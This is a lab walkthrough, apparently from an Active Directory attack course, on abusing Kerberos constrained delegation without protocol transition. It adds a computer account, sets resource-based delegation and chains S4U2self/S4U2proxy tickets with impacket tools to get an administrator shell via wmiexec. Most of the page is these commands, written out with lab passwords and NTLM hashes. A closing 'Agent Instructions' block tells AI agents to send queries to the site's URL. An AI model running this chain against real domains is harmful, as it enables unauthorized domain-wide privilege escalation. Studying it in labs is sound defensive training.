# Without protocol transition

To look at this option, rdp with Fernando.Alonzo

```
xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80%  /cert-ignore
```

This result to this in the windows GUI : 

<figure><img src="/files/rA9gAQ0D4xj3y5Kx512j" alt=""><figcaption></figcaption></figure>

* A good example of exploitation can be found here: <https://snovvcrash.rocks/2022/03/06/abusing-kcd-without-protocol-transition.html>

> The self-RBCD trick doesn’t work anymore. When i was writing this article i tried the self-rbcd without success many times. After multiple tries and fail i ask to charlie (@\_nwodtuhs) what i am doing wrong, because i can’t find out why this don’t work as expected. He explained to me that the self rbcd trick didn’t work anymore and have been silent patch by Microsoft :’(

* To exploit the constrained delegation here we only need a forwardable TGS as administrator to any service on castelblack
* But if we do a s4u (s4u2self + s4u2proxy) like we did with protocol transition, the s4uself will send us a not forwardable TGS and the attack will fail.
* So to exploit and get the forwardable TGS we need, we first need to add a computer and use RBCD between the created computer (rbcd\_const$) and the computer who have delegation set (here castelblack$).
* By doing that, you can do a s4u2self followed by a s4u2proxy on the added computer and the result is a forwardable tgs on hots/castelblack$ as administrator.
* Once that done, you have the forwardable ticket to pass to s4u2proxy, and we even can change the request service with -altservice

```
# add computer X (rbcd_const)
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.newyork.local/pablo.sandoval:baseballpanda'

# add rbcd from X (rbcd_const) to constrained (Yonkers)
rbcd.py -delegate-from 'rbcd_const$' -delegate-to 'Yonkers$' -dc-ip 192.168.56.11 -action 'write' -hashes ':2634cbdd337c86aa0ecffd1dd457a2a8' north.newyork.local/'Yonkers$'
```

* Do the s4u2self followed by the s4u2proxy on Yonkers  (this is the classic RBCD attack)

```
# s4u2self on X (rbcd_const)
getST.py -self -impersonate "administrator" -dc-ip 192.168.56.11  north.newyork.local/'rbcd_const$':'rbcdpass'
```

<figure><img src="/files/XURhQ5JO9ztqWb8lxlp2" alt=""><figcaption></figcaption></figure>

```
# s4u2proxy from X (rbcd_const) to constrained (Yonkers)
getST.py -impersonate "administrator" -spn "host/Yonkers" -additional-ticket 'administrator@rbcd_const$@NORTH.newyork.LOCAL.ccache' -dc-ip 192.168.56.11  north.newyork.local/'rbcd_const$':'rbcdpass'
```

<figure><img src="/files/nJR69iXLJJ6ZEo644xFg" alt=""><figcaption></figcaption></figure>

* And launch the s4uProxy with the forwardable ticket

```
# s4u2proxy from constrained (yonkers) to target (bronx) - with altservice to change the SPN in use
getST.py -impersonate "administrator" -spn "http/bronx" -altservice "cifs/bronx" -additional-ticket 'Administrator@host_yonkers@NORTH.NEWYORK.LOCAL.ccache' -hashes :2634cbdd337c86aa0ecffd1dd457a2a8 -dc-ip 192.168.56.11 north.newyork.local/'yonkers$'

export KRB5CCNAME=/workspace/administrator@cifs_yonkers@NORTH.NEWYORK.LOCAL.ccache 
wmiexec.py -k -no-pass north.newyork.local/administrator@yonkers
```

<figure><img src="/files/cNJ9okL3BzejrXhWB8Aa" alt=""><figcaption></figcaption></figure>

* After the exploit a little clean up of the lab, flush the rbcd entry and delete the computer account with a domain admin:

```
rbcd.py -delegate-to 'yonkers$' -delegate-from 'rbcd_const$' -dc-ip 192.168.56.11 -action 'flush' -hashes ':2634cbdd337c86aa0ecffd1dd457a2a8' north.newyork.local/'Yonkers$'
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1!' -delete
```

<figure><img src="/files/oxt8V8rHxjzvDYBc0snZ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/v1NfPcKPVOuY90vzi44w" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/delegations/constrain-delegation/without-protocol-transition.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.